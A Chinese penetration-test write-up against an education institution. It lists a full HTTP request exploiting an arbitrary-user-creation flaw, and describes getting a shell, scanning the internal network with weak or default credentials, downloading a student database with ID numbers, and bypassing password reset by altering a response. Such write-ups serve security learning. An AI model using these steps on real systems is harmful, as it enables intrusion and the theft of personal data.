记一次某edu单位的渗透

0x01 信息收集

第一步当然是从信息收集开始,因为通常主域名基本不会含有高危漏洞。可以通过子域名->子域名端口扫描的方式去进行一个信息收集用来提高攻击面。这里是用fofa进行攻击面的扩大。(如果fofa脆弱系统较少可以自己爆破子域名+端口1-65535扫描的方式去进行渗透测试)。

然后把资产去重,可以使用关键词用来寻找一些存在漏洞概率高一些的系统。比如搜索有登录的系统,可以添加body="登录"这种关键字去进行查找。比如这里是找到了一个日志系统。

也可以通过googlehack进行搜索学号,身份证之类的信息。可以通过学号身份证这些信息用来登录某些系统,大部分的学校系统的口令格式是学号/身份证后6位。(这里随便找一个案例)

0x02 命令执行

可以根据通用系统的历史漏洞去对该系统进行渗透测试。

首先尝试默认口令进行登录 admin/panabit 未果。

然后建议百度搜索时间设置为一年内,可以省不少时间实际测试感觉一年之前的漏洞修复概率比较高。(可能是一年一次hvv的原因?)

也可以用微信的公众号搜索,比较推荐,因为准确率比较高,都是一些新出的漏洞。

然后使用任意用户创建漏洞添加一个用户

vbnet 复制代码
POST /singleuser_action.php HTTP/1.1Host: xxxxCookie: xxxxSec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="92"Accept: */*X-Requested-With: XMLHttpRequestSec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: xxxxAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Length: 574​{ "syncInfo": { "user": { "userId": "001", "userName":"001", "employeeId": "001", "departmentId": "001","departmentName": "001", "coporationId": "001","corporationName": "001", "userSex": "1", "userDuty": "001","userBirthday": "001", "userPost": "001", "userPostCode":"001", "userAlias": "001", "userRank": "001", "userPhone":"001", "userHomeAddress": "001", "userMobilePhone": "001","userMailAddress": "001", "userMSN": "001", "userNt": "001","userCA": "001", "userPwd": "001", "userClass": "001","parentId": "001", "bxlx": "001" },"operationType":"ADD_USER" } }

成功登录后台

然后使用后台命令执行进行getshell,成功进入内网。系统维护->终端命令

0x03 内网渗透

首先使用fscan扫描一波内网。

帮助网安学习,全套资料S信领取:

① 网安学习成长路径思维导图

② 60+网安经典常用工具包

③ 100+SRC漏洞分析报告

④ 150+网安攻防实战技术电子书

⑤ 最权威CISSP 认证考试指南+题库

⑥ 超1800页CTF实战技巧手册

⑦ 最新网安大厂面试题合集(含答案)

⑧ APP客户端安全检测指南(安卓+IOS)

其中有个ftp弱口令,这里stuinfo.sql可能是某个数据库的备份文件。根据名字猜测是学生信息的备份。

下载之后导入本地数据库打开,果然泄露了一堆身份证,学号这些信息。

之后还在另外一个back文件夹中发现了另外一个xls表格,

ssh弱口令一堆,随便

h3c默认密码登录

0x04 任意密码找回

这里是另外一个外网系统。因为内网属实是没啥东西所以又得重新去外网找找有没有其他漏洞。

确定存在用户,输入用户名会发送一个包,不存在用户返回0,存在返回1

点击忘记密码,随便输入密保问题跟答案。

Burp抓包,将验证返回包中的false改为true。

然后就发现跳转到了修改密码的页面

这时直接修改一波密码,ok成功登录

0x05 总结

主要内网的一些问题还是弱口令使用较多,而且老版本的漏洞基本不修复的问题。另外一提进行渗透测试必须获得目标单位的合法授权,并且在合规框架下进行。在任何情况下,未经授权的渗透测试行为都是违法的,可能导致严重的法律后果。因此,在进行任何安全测试之前,请务必与目标单位达成明确的协议和授权。

相关推荐
爱上妖精的尾巴21 分钟前
5-22 WPS JS宏reduce数组的归并迭代应用(实例:提取最大最小值的记录)
服务器·前端·javascript·笔记·wps·js宏
IT_陈寒34 分钟前
Java性能调优:这5个被你忽略的JVM参数让你的应用吞吐量提升50%!
前端·人工智能·后端
叶梅树1 小时前
从零构建量化学习工具:动量策略(Momentum Strategy)
前端·后端·机器学习
MyFreeIT2 小时前
Page光标focus在某个控件
前端·javascript·vue.js
通往曙光的路上2 小时前
day8_elementPlus
前端·javascript·vue.js
Simon_He2 小时前
最强流式渲染,没有之一
前端·面试·ai编程
你真的可爱呀2 小时前
uniapp学习【路由跳转 +数据请求+本地存储+常用组件】
前端·学习·uni-app
Jeffrey__Lin2 小时前
解决ElementPlus使用ElMessageBox.confirm,出现层级低于el-table的问题
前端·javascript·elementui·vue·elementplus
咖啡の猫2 小时前
Vue-MVVM 模型
前端·javascript·vue.js
xvmingjiang2 小时前
Element Plus el-table 默认勾选行的方法
前端·javascript·vue.js